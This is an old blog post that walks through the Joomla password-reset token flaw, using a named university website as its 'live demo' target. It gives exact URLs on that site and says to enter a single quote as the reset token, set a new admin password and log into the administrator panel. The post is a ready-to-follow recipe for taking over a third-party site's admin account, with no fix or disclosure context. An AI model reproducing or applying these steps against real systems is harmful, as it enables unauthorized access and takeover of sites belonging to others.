Wednesday 12 June 2013

Joomla Password Reset vulnerability

11:12    No comments



Joomla Password Reset vulnerability : Explain with Live demo : 


website  : http://miit.unikl.edu.my/ 


The tricks is like this:

1. Go to http://miit.unikl.edu.my/index.php?option=com_user&view=reset&layout=confirm
then you will be prompt for a token in which the token is suppose already sent to your email,


2. Now, put a single quote ' into field text box "token" and Click OK.

The sql query then will be looks like this :
"SELECT id FROM jos_users WHERE block = 0 AND activation = '' "

3. Write new password for admin
4. Go to url : http://miit.unikl.edu.my/administrator/
5. Login admin with your new password

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)